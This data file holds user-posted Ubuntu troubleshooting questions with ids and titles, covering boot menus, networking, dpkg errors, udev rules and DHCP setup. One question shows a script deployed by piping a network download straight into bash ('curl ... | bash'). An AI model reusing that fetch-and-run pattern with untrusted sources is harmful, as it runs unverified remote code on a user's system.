423048	is it safe to resume interrupted copying without replacing copied files ?	when i move large files sometimes system hangs or it distrupts somehow . when i resume copying , nautilus provides me options to merge folders then to replace files . for time-saving is it safe to resume interrupted copying without replacing copied files ? it 's discussed in this topic but no definite answer for ubuntu resume interrupted copy
423049	desktop switching shortcuts not working at all !	some time ago i was tampering with settings and installing new applications and i somehow disabled desktop switching by shortcut ( i think it was cairodock that did it ) . now i always have to click on the workspace switcher icon and go to other desktop . however the strange part is that the shortcuts are there in system settings - > keyboard - > shortcuts . i changed them for other random shortcuts , but nothing worked . and even in ccsm , i enabled put or desktop wall and configured the shortcuts , but they did n't work either . can someone help me now , how to enable desktop switching by the usual shortcuts like ctrl+alt+left ? thanks in advance . i have ubuntu 12.04 64-bit , if it helps .
423052	ubuntu 12.04 - ca n't detect 2 displays	i 'm running ubuntu 12.04 , my graphic card is : vga compatible controller : intel corporation haswell integrated graphics controller ( rev 06 ) i have 2 display but the desktop is not extended , both displays show the same screen . if i go to display settings , it says that a laptop display is detected , but not 2 displays . how can i use both displays for an extended view ?
423053	unclutter still underlines links in chrome	i 'm running unclutter on ubuntu 13.10 . all works well , except when i 'm using chrome or firefox links still underline when moused over by the invisible cursor . is there a way to prevent this behavior ? thanks !
423055	no boot menu after re-installing ubuntu ultimate	sir , i am running amd 64 pc . in my pc i installed windows 8 first . after i installed ubuntu 12.04 . after some days , i uninstalled ubuntu 12.04 by the cmd command `` bootrec/fixmbr '' . after that i installed ubuntu ultimate . the partition was like this 100 gb ext4 5 gb swap 20 gb ext3 after installing i rebooted but i cant find ubuntu ultimate and the system is automatically directed to windows 8 . please help me
423056	how to install sclilab in gui mode	i downloaded scilab package and install it . but it shows only cli mode . how can i install gui mode for scilab . i am also used sudo apt-get install scilab but prolem remain same . help me guys .
423058	internet connection problems	i 'm new to ubuntu . i 'm using ubuntu 12.04 . my problem is that i can not connect to the internet with my d-link modem . i 've tried using the lsusb command . it shows that my modem has been plugged in , but i can not configure the modem to connect to the internet .
423063	what happen to kompozer ? is there an easy way to install in 13.10 ?	what happen to kompozer ? is there an easy way to install it in ubuntu 13.10 ?
423065	open gpg seems to be affecting rendering of emails in thunderbird	i recently installed/added open gpg and enigmamail to thunderbird in order that i could send encrypted emails , but obviously i will only be doing this with a couple of people . however , it seems to have forced all emails in the account that i set it up with to only show in plain text , with no formatting other than paragraphs , no pictures etc . are there ways round this ? i would be interested in any method - whether i can turn it on/off do it for individual emails , individual email addresses etc i know this is n't very ubuntu specific , but i imagine it would get laughed off the other tech based stack exchange websites
423066	mdadm large memory consumption	i 'm building mdadm raid 6 ( 8 wd red 3 tb ) on ubuntu 13.10 x64 server with ext4 file system . when i download torrent on the array , server ram is filled for maximum cap ( 8 gb ) . memory becomes free when i manualy enter : sync ; echo 3 > /proc/sys/vm/drop_caches this is is mdadm -d output : /dev/md127 : version : 1.2 creation time : sun feb 16 18:47:05 2014 raid level : raid6 array size : 17580801024 ( 16766.36 gib 18002.74 gb ) used dev size : 2930133504 ( 2794.39 gib 3000.46 gb ) raid devices : 8 total devices : 8 persistence : superblock is persistent update time : wed feb 19 14:30:40 2014 state : clean active devices : 8 working devices : 8 failed devices : 0 spare devices : 0 layout : left-symmetric chunk size : 512k name : corvsrv:2 ( local to host corvsrv ) uuid : d6ca33d3:925c7c82:891c9f07:1f2cb07a events : 121 number major minor raiddevice state 0 8 33 0 active sync /dev/sdc1 1 8 49 1 active sync /dev/sdd1 2 8 65 2 active sync /dev/sde1 3 8 81 3 active sync /dev/sdf1 4 8 97 4 active sync /dev/sdg1 5 8 113 5 active sync /dev/sdh1 6 8 129 6 active sync /dev/sdi1 7 8 145 7 active sync /dev/sdj1 how to reduce mem consumption ?
423067	how to delete file with permission ?	this is output of ls -l of the file . ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? es0g00og0qex-pslsdocmdfj9skdl ( filename is red color ) it 's a file in /fscache/cache under /data of my ubuntu home station . i used root user to delete it , change its permission and everything i could think about , but it does n't work and shown `` no such file or directory '' error . is there anyone know how to delete this kind of file ? additional info : results of mount -v |grep data /dev/md4 on /data type xfs ( rw ) results of fdisk -l |grep /dev/sda4 disk /dev/md4 does n't contain a valid partition table /dev/sda4 101713920 312581807 105433933 fd linux raid autodetect`
423072	sharing git repo on ntfs partition between linux/windows dualboot	i 've posted this question already stackoverflow but got no answer : click since i 'm having this problem on ubuntu i repost my question here . i hope this is not forbidden . i 'm developing an ( qt ) application which should run under windows and linux . so , i want to be able to develop under windows and linux , too . therefore i have stored my project ( as git repo ) on a ntfs partition which i mount under linux ( ubuntu 13.10 ) . to avoid the rights problem of the compiled executable i set the shadow build directory to my home folder under linux . this approach work quit good so far . but there are some effects that make me worry : if i stage some changed files ( with smartgit ) , smartgit does n't reflect that i have stage them . they are still displayed as unstaged . similar thing when commiting : after the commit , the commited changes are still display as if they where not commit . but in the log i can see they are commited . closing an reopen the repo `` solves '' this issues or is a workaround at least . but i have concerns that i break my repo using it on a ntfs partition under linux . or is there no risk that my repo is getting corrupted one day using it that way ?
423074	putty fatal error : network error : connection refused ( ubunty server )	i applied the below mention code to my server and after few mins i tried to re-connect to the putty then its started showing me this error putty fatal error : network error : connection refused ( ubunty server 6.06.1 ) this below piece of code , i applied in my server through putty , is the below changes making my problem ? ... ... . ubuntu linux shutdown the x server ( http : //theos.in/news/ubuntu-linux-shutdown-the-x-server/ ) ... ... . another way - you can change the current runlevel from a command line , you can use the init command to go immediately into runlevel 1 , which is also known as single user text mode . open terminal and type the following command : sudo init 1 again get back to gui with init 2 command : sudo init 2 when you type init 1 command your session will then begin to shut down and bring you into single user text mode . when you type init 2 command your session will then begin to shut down and bring you into gui mode : ) please help me , i need to solve this error before my boss sees this error
423077	ajax request not get filtered	i have installed the lamp on ubuntu 12.04 . but when any ajax request has made to server it does not detect . where as on other pc its working fine . is there are some setting to make it active ?
423078	lampp already started and server sends and receives mail to gmail but php script mail error & works after lampp restart	lampp dovecot postfix already started and website working with apache , mysql started and server can send and receive mail to gmail but mail from php script gives error and works s only after lampp restart . where is the problem . how to diagnose .
423083	ca n't run `` dpkg -- add-architecture i386 '' on 12.04 64-bit to run eclipse adt	running ubuntu 12.04 64 bit . i am trying to follow the steps written at the end of this page under the heading : installing android sdk compat libraries . i am doing it in order to solve this problem . but when i run the first command sudo dpkg -- add-architecture i386 it fails and gives the following output pkg : error : unknown option -- add-architecture type dpkg -- help for help about installing and deinstalling packages [ * ] ; use `dselect ' or `aptitude ' for user-friendly package management ; type dpkg -dhelp for a list of dpkg debug flag values ; type dpkg -- force-help for a list of forcing options ; type dpkg-deb -- help for help about manipulating *.deb files ; options marked [ * ] produce a lot of output - pipe it through `less ' or `more ' ! how can i successfully run this command ? output of dpkg -- help usage : dpkg [ < option > ... ] < command > commands : -i| -- install < .deb file name > ... | -r| -- recursive < directory > ... -- unpack < .deb file name > ... | -r| -- recursive < directory > ... -a| -- record-avail < .deb file name > ... | -r| -- recursive < directory > ... -- configure < package > ... | -a| -- pending -- triggers-only < package > ... | -a| -- pending -r| -- remove < package > ... | -a| -- pending -p| -- purge < package > ... | -a| -- pending -- get-selections [ < pattern > ... ] get list of selections to stdout . -- set-selections set package selections from stdin . -- clear-selections deselect every non-essential package . -- update-avail < packages-file > replace available packages info . -- merge-avail < packages-file > merge with info from file . -- clear-avail erase existing available info . -- forget-old-unavail forget uninstalled unavailable pkgs . -s| -- status < package > ... display package status details . -p| -- print-avail < package > ... display available version details . -l| -- listfiles < package > ... list files `owned ' by package ( s ) . -l| -- list [ < pattern > ... ] list packages concisely . -s| -- search < pattern > ... find package ( s ) owning file ( s ) . -c| -- audit check for broken package ( s ) . -- print-architecture print dpkg architecture . -- compare-versions < a > < op > < b > compare version numbers - see below . -- force-help show help on forcing . -dh| -- debug=help show help on debugging . -h| -- help show this help message . -- version show the version . use dpkg -b| -- build|-c| -- contents|-e| -- control|-i| -- info|-f| -- field| -x| -- extract|-x| -- vextract| -- fsys-tarfile on archives ( type dpkg-deb -- help ) . for internal use : dpkg -- assert-support-predepends | -- predep-package | -- assert-working-epoch | -- assert-long-filenames | -- assert-multi-conrep | -- assert-multi-arch . options : -- admindir= < directory > use < directory > instead of /var/lib/dpkg . -- root= < directory > install on a different root directory . -- instdir= < directory > change installation dir without changing admin dir . -- path-exclude= < pattern > do not install paths which match a shell pattern . -- path-include= < pattern > re-include a pattern after a previous exclusion . -o| -- selected-only skip packages not selected for install/upgrade . -e| -- skip-same-version skip packages whose same version is installed . -g| -- refuse-downgrade skip packages with earlier version than installed . -b| -- auto-deconfigure install even if it would break some other package . -- [ no- ] triggers skip or force consequential trigger processing . -- no-debsig do not try to verify package signatures . -- no-act| -- dry-run| -- simulate just say what we would do - do n't do it . -d| -- debug= < octal > enable debugging ( see -dhelp or -- debug=help ) . -- status-fd < n > send status change updates to file descriptor < n > . -- log= < filename > log status changes and actions to < filename > . -- ignore-depends= < package > , ... ignore dependencies involving < package > . -- force- ... override problems ( see -- force-help ) . -- no-force- ... | -- refuse- ... stop when problems encountered . -- abort-after < n > abort after encountering < n > errors . comparison operators for -- compare-versions are : lt le eq ne ge gt ( treat empty version as earlier than any version ) ; lt-nl le-nl ge-nl gt-nl ( treat empty version as later than any version ) ; < < < < = = > = > > > ( only for compatibility with control file syntax ) . use `dselect ' or `aptitude ' for user-friendly package management . output of dpkg -- force-help : dpkg forcing options - control behaviour when problems found : warn but continue : -- force- < thing > , < thing > , ... stop with error : -- refuse- < thing > , < thing > , ... | -- no-force- < thing > , ... forcing things : [ ! ] all set all force options [ * ] downgrade replace a package with a lower version configure-any configure any package which may help this one hold process incidental packages even when on hold not-root try to ( de ) install things even when not root bad-path path is missing important programs , problems likely bad-verify install a package even if it fails authenticity check bad-version process even packages with wrong versions overwrite overwrite a file from one package with another overwrite-diverted overwrite a diverted file with an undiverted version [ ! ] overwrite-dir overwrite one package 's directory with another 's file [ ! ] unsafe-io do not perform safe i/o operations when unpacking [ ! ] confnew always use the new config files , do n't prompt [ ! ] confold always use the old config files , do n't prompt [ ! ] confdef use the default option for new config files if one is available , do n't prompt . if no default can be found , you will be prompted unless one of the confold or confnew options is also given [ ! ] confmiss always install missing config files [ ! ] confask offer to replace config files with no new versions [ ! ] architecture process even packages with wrong or no architecture [ ! ] breaks install even if it would break another package [ ! ] conflicts allow installation of conflicting packages [ ! ] depends turn all dependency problems into warnings [ ! ] depends-version turn dependency version problems into warnings [ ! ] remove-reinstreq remove packages which require installation [ ! ] remove-essential remove an essential package warning - use of options marked [ ! ] can seriously damage your installation . forcing options marked [ * ] are enabled by default .
423084	copying a file between two os , if one os is virtual	i have windows on my laptop as primary os & ubuntu on virtual machine . i want to copy a file from ubuntu to windows . please , tell me any way to do this .
423087	low texture graphics in mupen64	i installed mupen64plus in my system and tried to run ocarina of time . instead of the nostalgic polygonal graphics i saw low texture graphics where green turned to brown and link 's face missing . i had a similar problem when running opensonic . when i checked system information it showed this driver intel速 845g x86/mmx/sse2 experience standard how can i fix this ?
423092	deleting option of ubuntu from boot manager	i dual booted windows 7 and ubuntu 12.04 using ( windows installer for ubuntu dekstop ) on different partitions . i formatted the partition on which ubuntu was installed and now in boot menu there is still option for ubuntu . i want to get rid of that . someone help
423096	corrupt ubuntu server iso images	this is the 3rd time i 've downloaded ubuntu-12.04.4-server-amd64.iso from the ubuntu site , and even then i get the message in the screenshot below . have any of you had this problem ? i do n't think i 'm doing anything wrong . i 'm downloading using chrome without splitting the file into pieces ( like an accelerator would do ) . is there something wrong with the isos themselves , or is this a windows problem ? the md5s never match . i 'm doing all this on a dell laptop with 4gb ram running windows 7 home premium 64 . can someone help ? edit : i 'm trying to get it running on oracle 's virtual box . am i wrong in using the 64bit iso ? it say 's amd64 but i 've got intel : - ) when i run check cd-rom , i get this :
423098	non-translucent dock	is there an option to have non-translucent dock when i have an application maximized ? i have combed through system settings and nothing remotely refers to that . by the way i am running ubuntu 14.04 daily builds . thanks .
423099	why does my udev rule run several times ?	i want to when i plug an usb device to my laptop , a script will be run just one time . so i use the udev rules system in ubuntu 12.04 . i wrote the below udev rule : action== '' add '' , subsystems== '' usb '' , run+= '' /home/hossein/desktop/test '' . the below commands is written in the test script : # ! /bin/bash echo hello > > /home/hossein/desktop/file.txt my problem is that when i attach a usb device , about 13 times the word hello is written in the file.txt while i just expect one time occurrence of hello . what 's the reason ?
423101	access terminal stdin when it 's the source of the bash script itself	this is slightly messy to explain . i have a script that i want to deploy like this : curl -ls example.com/myscript.sh | bash the trouble is the script reads from standard input like so : echo `` you should edit /srv/pillar/tm.sls now . comments are in the file . '' echo type `` skip '' to skip or anything else to edit . read text if [ `` $ text '' ! = `` skip '' ] ; then sudo pico /srv/pillar/tm.sls fi now , since stdin is obviously serving as the source of the script itself , this does n't currently work . is there a way i can regain the terminal ? ( the current workaround is to deploy it like this : curl -ls example.com/myscript.sh > myscript.sh & & bash myscript.sh )
423102	disable right click option on a x1 carbon gen 2 synaptics touchpad	i would like to disable the right click functionality when i click on the right side of the synaptic 's touch-pad . i 've tried the synaptic tool but it did n't apply the setting . below is a question that someone had a similar issue but answers given over there did n't end up solving my issue . how do i disable the right side of my trackpad ? any help will be highly appreciated . thank you .
423104	is there an ubuntu mini install	is there an installable ubuntu mini iso that is just a command line ? i 'm building a distro and i need to know .
423109	how can force a bash script to execute in www , and not executing in filesystem/* ?	i have some .sh bash scripts which creates some directories , downloads some sourcefiles via svn and so on . the scripts works every well , but it annoys me that they are performing the action in filesystem/* , not in wwww . if they create a directory like /data , it is created as filesystem/data , not www/path/data . i have tried running the scripts from within subdirectories , eg wwww/install/sh but all the action is still performed in filesystem/* . i have also tried running with ./ , no luck . i am always able to copy the generated file structure from filesystem/ to www , but i would really like to know how i can force bash to execute where it is . there is no hardcoded links pointing to filesystem , one of the .sh files looks like this # ! /bin/sh cd / mkdir data cd /data svn checkout < path to svn > mb32 cd mb32 mv www/htaccess.txt www/.htaccess install_path=`pwd` install_path= $ install_path '' / '' to_replace= '' # php_value auto_prepend_file '' replace_by= '' php_value auto_prepend_file '' eval sed -i \'s/ $ to_replace/ $ replace_by/\ ' www/.htaccess to_replace= '' /my/root/path/ '' replace_by= $ install_path args= '' -i 's| $ to_replace| $ replace_by| ' www/.htaccess '' eval sed $ args cp www/.htaccess imageserver/ eval sed -i 's/app.server.php/image.server.php/g ' imageserver/.htaccess echo `` changing permissions to configuration and log ... '' sudo chmod -r 775 configuration sudo chmod -r 775 log echo `` done '' when it is runned from terminal , for example from www/a/test , it insists to create filesystem/data and download to filesystem/data/mb32 . i would like it to download to www/install/data etc . i am obviously missing some very simple and basic .
423110	how to change content of interfaces file ?	my /etc/network/interfaces file looks like this auto lo iface lo inet loopback auto eth0 iface eth0 inet static address 192.168.81.20 netmask 255.255.255.0 gateway 192.168.81.1 network 192.168.81.0 dns-nameservers 192.168.81.1 auto eth1 iface eth1 inet static address 10.0.0.1 netmask 255.255.255.0 network 10.0.0.0 there was no dhcp server installed on my ubuntu server 13.10. so i installed dhcp server using sudo apt-get install isc-dhcp-server then i copied this content in dhcpd.conf // sample /etc/dhcpd.conf // ( add your comments here ) default-lease-time 600 ; max-lease-time 7200 ; option subnet-mask 255.255.255.0 ; option broadcast-address 192.168.1.255 ; option routers 192.168.1.254 ; option domain-name-servers 192.168.1.1 , 192.168.1.2 ; option domain-name `` mydomain.example '' ; subnet 192.168.1.0 netmask 255.255.255.0 { range 192.168.1.10 192.168.1.100 ; range 192.168.1.150 192.168.1.200 ; } basically i followed this tutorial to install dhcp server but still my interfaces file is showing the same content as previously ? ? ? i want my interfaces file to look similar to this auto lo iface lo inet loopback auto eth0 iface eth0 inet dhcp auto eth1 iface eth1 inet static address 192.168.3.1 network 192.168.3.0 netmask 255.255.255.0 after installing dhcp i should get auto eth0 iface eth0 inet dhcp in interfaces file right ? ? ?
423114	keyboard shortcut to shutdown ?	i came across why do we need to be root in terminal for shutdown and restart ? and the accepted answer has an explanation indicating that clicking on `` shutdown '' in ubuntu 's dropdown menu triggers this command : dbus-send -- system -- print-reply -- dest=org.freedesktop.hal /org/freedesktop/hal/devices/computer org.freedesktop.hal.device.systempowermanagement.shutdown i also saw are there any keyboard shortcuts to shutdown ? which suggested this code : dbus-send -- system -- print-reply -- system -- dest=org.freedesktop.consolekit /org/freedesktop/consolekit/manager org.freedesktop.consolekit.manager.stop the two codes differ . ( also , i do n't know why -- system comes twice in second code . ) which code is appropriate for 13.10 ? or is there a new code to be used ? then i can make keyboard shortcut of this command to shutdown my computer from the keyboard instead of having to use the mouse to click on `` cogwheel '' , `` shutdown '' .
423115	what does `` not supported '' mean ?	when i ran the dvd for installing ubuntu 12.04 ( 32 bit ) - needed `` install cd boot helper '' and after clicking `` install and demo '' and re-boot a message is displayed `` not supported '' . i 'm running my computer with windows xp home ( 32 bit ) . i 'm able to run the the demo version of ubuntu . i then installed ubuntu on a separate partition ( 30gb ) to xp which seemed to be successful because i could get on line and try the various programmes successfully . on exiting from ubuntu the scene went black and subsequent attempts to re-boot ubuntu & xp failed . re-booting with ubuntu did n't give access to the installed programme but could access as a guest . to get xp working again i had to format the hard disc and re-install xp . '' was `` not supported '' a warning that i could't run ubuntu on my computer ? if so why ?
423123	printer simulator for ubuntu	is there anyway i could simulate a bunch of printers in my system in order to do some printing testing in different printers for ubuntu ? i need to test different printers for my software .
423125	brasero - disc copy	when i click on disc copy in brasero menu , i get this window . i should select the source disc to copy , but the drop-down menu empty default . i can click on it and it show my dvd label , it cant be select . it still empty after click too . sometimes it works fine . and it happened regularly with my previous computer too . can anyone help me ? ?
423127	triple boot : osx ( 10.6 ) , win7 , and ubuntu 12.10	i managed to install three os on my mbp 7,1 running most of the time on snow leopard . somehow , i managed to run windows 7 on parallels desktop while ubuntu partition does n't seem to mount even via disk utility . i wanted to ask if i missed something ? i formatted the ubuntu disk in an ext4 format . should it be ext3 in order to mount it well on snow and have it detected by a virtual machine software ? thanks !
423129	after updating ubuntu 12.04 my screen is flipped	after updating ubuntu 12.04 my screen is flipped and i ca n't do anything problem of graphic ( even open a windows ) , the problem gets temporarily `` fixed '' when i restart the computer manually by switching on/off with the power button and start recovery mode , but when i shut down the computer and start normal mode i have the same problem .
423130	error while loading windows boot cd after using ubuntu	i 've tried to install ubuntu in my pc . actually it showed some partition : total hdd : 500 gb dev/sda2 : 74 gb . dev/sda3 : 410 gb . -i 've formatted 74 gb to ext4 format to install ubuntu . -then after it showed an grub error . now , i wan na back windows but it is completely ruined.it never shows my hdd partitions . please provide me a suggestion i want all data in the partition .
423133	assining permission to www folder	very new to linux ( ubuntu ) . so getting lost each moment where this time i just installed apache and trying to create file in www folder . but it is giving permission error . now i do n't even know how to reach to the www folder in terminal . embarrassing but just ca n't find a way . can anyone help me to set permission for this folder ? also how to reach to the folder in terminal .
423135	alternative for removing ignore_device option in udev ?	recently , the option ignore_device has been removed from udev rules . what is the alternative to deny a device to mount or to connect to system in udev rules ?
423138	openvz ubuntu 12.04 mutt accent problem	i 'm trying to resolve the problem of accent on mutt because , they are displayed like ' ? ' or '\123 ' . i know there is a good documentation on mutt ( http : //dev.mutt.org/trac/wiki/muttfaq/charset ) for this but i 've tried all tips with no success . i 'm on a openvz machine ( ubuntu 12.04 x86 ) , this is my configuration for locales and charset on mutt : .muttrc : set charset=utf8 locale : lang=en_us.utf8 i do n't find where is my error and how can i resolve this mutt version : mutt 1.5.21 ( 2010-09-15 ) many thanks for your help !
423142	combine saved search folders with inbox	is it possible to create a view/saved search folder which displays all the message in the inbox as well as tagged messages in any folder all in the same message list ? basically the idea is so that i can see in one list all messages that need attention as well as all messages still in the inbox that have not yet been filed .
423143	solving /var/lib/dpkg/lock - open ( 13 : permission denied ) with `` are you root ? '' error	error : e : could not open lock file /var/lib/dpkg/lock - open ( 13 : permission denied ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , are you root ? so , i 've seen this error crop up a few times and get it as a result of using the following commands : sudo apt-get update & & apt-get upgrade i 'm acting as root and have ensured that none of the update managers are running . first i tried to check what was locking it using : sudo lsof /var/lib/dpkg/lock with output of : lsof : warning : ca n't stat ( ) fuse.gvfs-fuse-daemon file system /home/gareth/.gvfs output information may be incomplete . just in case i have tried to remove the lock using : sudo rm /var/lib/apt/lists/lock sudo rm /var/cache/apt/archives/lock ... to no avail . interestingly , if i am actually root and use : sudo -s apt-get update & & apt-get upgrade ... the update works . so i can update and upgrade my packages as long as i am literally root which is somewhat frustrating . it also implies it more to do with permissions than something else locking the directory perhaps ? thanks in advance with any assistance on this .
423144	validity sensor ( 138a:0017 ) fingerprint reader not working	i recently bought a thinkpad ( t440p ) and installed ubuntu 13.10 . it should be certified for ubuntu . but there is one thing , which does n't work out of the box . my validity sensors fingerprint reader ( 138a:0017 ) is n't usable . how can i configure it and use this in ubuntu ?
423146	desktop flickering after suspend or sleep	i seem to be experiencing some issues around my desktop display when my monitor has gone to sleep or i 've suspended my system . not always the case , but trying to turn it back on by moving my mouse , makes the entire desktop and logon screen unusable . i 've been struggling to find a proper fix for this , and after reading this post : kubuntu corrupt screen after lid close/screensaver i believe it may have something to do with desktop effects . i do enjoy my effects , but if that 's the fix , then i 'll gladly do it . i have however found another way of getting around this . in the past i used to have to shut down or restart my machine to get the display working properly again , but i had a bunch of apps open and did n't want to lose work , so logged on via console , and then ran `` startx '' . this created a new desktop on tty8 , and logged me on . when i revert back to tty 7 ( ctrl+alt+f7 ) the display no longer flickers , and i can log on without any problems . if anyone has found any proven proper solution to bypass this issue , any assistance would be appreciated . ... from further findings , this is yet to prove that it has anything to do with my desktop effects . it still happens without any effects enabled . switching console windows , fixes the issue most of the time , but it means i have to go through each console up until it stops working , and i have to reboot .
423147	is it safe to purge resolvconf if you handle /etc/resolv.conf via puppet ?	we have multiple servers running 12.04 lts and 10.04 lts with static network settings . is it safe to purge the package resolvconf if you handle /etc/resolv.conf via puppet ?
423151	unable to find the wifi symbol at the top right corner	i am a newbie to ubuntu . i have installed ubuntu 13.04 in vmware . everything went perfectly , but i was unable to find the wifi symbol in the notification area in the top right corner of the desktop . i have tried changing the memory allocation to 1gb , but even then it was n't detecting the wifi . i also tried changing the network connection in the vmware virtual machine settings to bridged network connection . it just got disconnected from a wired connection and reconnected to that . can anyone please help me to overcome this problem ?
423155	how to backup my system so that i can create an exact replica on another computer	i have a ubuntu 12 lts and windows dual boot machine . my hard drive is going to fail soon and my machine has also become quite old now . i am buying a new computer soon . how can i restore my ubuntu copy on that machine ? i push all my code repos to the server , so i wont lose anything critical . but i would like not to have to make all the customization bash , webstorm settings , lxde bar , chrome etc . again .
423160	how can i use a git client with a gui on a bitbucket repo which i already worked on ?	i have a bitbucket account and opened a git repo there . i worked with the command line and made a few simple test commits for a few simple text files . it 's actually quite simple , if i just use it the , um , standard things with it , for the lack of a better term . so far , so good . now i would like to use a git client with a gui on the said repo . i intend to do this on xubuntu 13.10 first , alter with windows 7 as well . say i use git gui or git-cola , do i simply open the folder on my pc and that 's it ?
423164	what version ubuntu is best	i have a netbook msi u135 ddr 2 1gb with windows7 starter . i want to install , alongside it , a ubuntu version which is stable and fast running . can anyone tell me which one to install ? and to install ubuntu alongside windows7 starter , how to procede ? greetz chris .
423165	remotely access postgresql database	i need to access a postgresql database from a remote machine on a vps at digitalocean running 12.10 and postgresql 9.1 . how do i do this ? i noticed port 5432 is closed , how do i open this ?
423166	alternative to google drive for ubuntu	i switched over to xubuntu , but one of the most important things that i really need/use seems to not be available for linux . it 's google drive , and the ones i 've tried such as grive , just do n't work properly ( it syncs the first time you install it , but it does n't sync again , not even if i do it manually ) . so i wanted to ask if there 's any good software out there for ubuntu , that does work properly , that is a cloud based storage system with decent quota 's , like 10 gig if possible .
423167	can i permanently change the gui language of a certain program to english ?	is it possible to make a permanent change to the gui language of cola git gui or git gui ? i would like to have them both in english , whenever i start them . is this possible ? i know of the following threads : possible to change language to a specific application is it possible to change language for user interface temporarily ? but those feature ad-hoc solutions .
423168	random shutdowns/system hangs ( aptdaemon )	i 've tried turning acpi=off in grub but have had no luck . looking at my syslog in var/log , this is what happens before almost every shutdown with some variance : feb 19 07:37:08 x-desktop rsyslogd : [ origin software= '' rsyslogd '' swversion= '' 5.8.6 '' x-pid= '' 888 '' x-info= '' http : //www.rsyslog.com '' ] rsyslogd was huped feb 19 07:37:36 x-desktop aptdaemon : info : quitting due to inactivity feb 19 07:37:36 x-desktop aptdaemon : info : quitting was requested feb 19 07:37:37 x-desktop anacron [ 1034 ] : job `cron.daily ' terminated any suggestions ? i 'm an ubuntu noob and i 'm close to throwing in the towel . edit : some more info : ubuntu 12.04 precise kernel : linux x-desktop 3.2.0-58-generic # 88-ubuntu smp tue dec 3 17:37:58 utc 2013 x86_64 x86_64 x86_64 gnu/linux any other info that might be helpful ?
423169	get the bluetooth audio sink working with kubuntu 13.10 and bose mini soundlink	i 'm using kubuntu 13.10 with a bose mini soundlink . i have no issue discovering , pairing and trusting the external speaker . on the contrary , i 'm having great troubles in streaming the sound from the computer directly to the speaker via the audio sink feature . each time it times out and/or returns a `` stream setup failed '' error . i tried with the default bluetooth manager as well as with the bluedevil kde bluetooth stack but no luck so far . here 's what dmesg says : $ dmesg | grep -i blue [ 5.484915 ] bluetooth : core ver 2.16 [ 5.484938 ] bluetooth : hci device and connection manager initialized [ 5.484944 ] bluetooth : hci socket layer initialized [ 5.484945 ] bluetooth : l2cap socket layer initialized [ 5.484957 ] bluetooth : sco socket layer initialized [ 5.487753 ] bluetooth : rfcomm tty layer initialized [ 5.487762 ] bluetooth : rfcomm socket layer initialized [ 5.487763 ] bluetooth : rfcomm ver 1.11 [ 5.523001 ] bluetooth : bnep ( ethernet emulation ) ver 1.3 [ 5.523004 ] bluetooth : bnep filters : protocol multicast [ 5.523012 ] bluetooth : bnep socket layer initialized [ 21576.258783 ] bluetooth : wrong link type ( -14 ) [ 21576.260000 ] bluetooth : wrong link type ( -2 ) have you been able to get this working ( on any *buntu ) and if yes , how did you make it work ?
423177	install steam game with wine ?	today i installed wine and steam and my question is , how do i install games from steam to ubuntu and play them ? thanks for your help !
423178	wired network does not work in ubuntu , but works in windows 7	updated : i have pasted full output of bash command in ubuntu into here , including ifconfig , ping , nm-tool , modinfo and dmesg | grep e100 . hi all , i can surf internet in windows 7 , just pluging in the wired connetion , geting ip via dhcp of lan network . but i can not access internet in ubuntu ( 12.04 lts , 13.10 , or lubuntu 13.10 , or its live cd ) i have read some similiar posts that are suggested when i was typing the question title , but still failed to find out the solution . i have tried to upgrade the intel e1000e driver , after i read the keyword e1000e from a post . i have edited my eth0 's ip and dns manually instead of dhcp , using same ip values in windows where network works . however , i still can not access internet . i am wondering that : why i can access internet in windows using dhcp , but can not in ubuntu using dhcp too ? so i come here for seeking help , below is my network ip information , maybe you can help me to read these data and find out the solution . thanks for your help : ipconfig /all in windows when i can access internet ethernet adapter ±ÿµøá¬œó : connection-specific dns suffix . : description . . . . . . . . . . . : intel ( r ) 82577lm gigabit network connection physical address . . . . . . . . . : 00-26-2d-f9-51-71 dhcp enabled . . . . . . . . . . . : yes autoconfiguration enabled . . . . : yes link-local ipv6 address . . . . . : fe80 : :a4a1:264a : f270 : f8eb % 13 ( preferred ) ipv4 address . . . . . . . . . . . : 192.168.0.148 ( preferred ) subnet mask . . . . . . . . . . . : 255.255.255.0 lease obtained . . . . . . . . . . : 2014äê2ôâ19èõ 21:15:21 lease expires . . . . . . . . . . : 2014äê2ôâ19èõ 23:15:24 default gateway . . . . . . . . . : 192.168.0.1 dhcp server . . . . . . . . . . . : 192.168.0.1 dhcpv6 iaid . . . . . . . . . . . : 352331309 dhcpv6 client duid . . . . . . . . : 00-01-00-01-1a-8b-d1-4e-00-23-14-39-3e-e0 dns servers . . . . . . . . . . . : 202.96.209.5 202.96.209.133 netbios over tcpip . . . . . . . . : enabled ifconfig , nm-tool in ubuntu when i can not access internet lubuntu @ lubuntu : ~ $ ifconfig eth0 link encap : ethernet hwaddr 00:26:2d : f9:51:71 inet addr:192.168.0.148 bcast:192.168.0.255 mask:255.255.255.0 inet6 addr : fe80 : :226:2dff : fef9:5171/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:180 errors:0 dropped:0 overruns:0 frame:0 tx packets:216 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:47107 ( 47.1 kb ) tx bytes:24199 ( 24.1 kb ) interrupt:20 memory : f2500000-f2520000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:296 errors:0 dropped:0 overruns:0 frame:0 tx packets:296 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:23132 ( 23.1 kb ) tx bytes:23132 ( 23.1 kb ) wlan0 link encap : ethernet hwaddr 00:23:14:39:3e : e0 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) - device : eth0 [ wired connection 1 ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : e1000e state : connected default : yes hw address : 00:26:2d : f9:51:71 capabilities : carrier detect : yes speed : 100 mb/s wired properties carrier : on ipv4 settings : address : 192.168.0.148 prefix : 24 ( 255.255.255.0 ) gateway : 192.168.0.1 dns : 202.96.209.5 dns : 202.96.209.133 here is some extra information : i am using thinkpad t410s ( here is specification ) ; in ubuntu , when i enter any website , i was brought into a router welcome page ( 192.168.0.1/login.htm ) saying words like 'wan is not connected ' , but if wan is not connected to the router , how can i access internet perfect in windows .
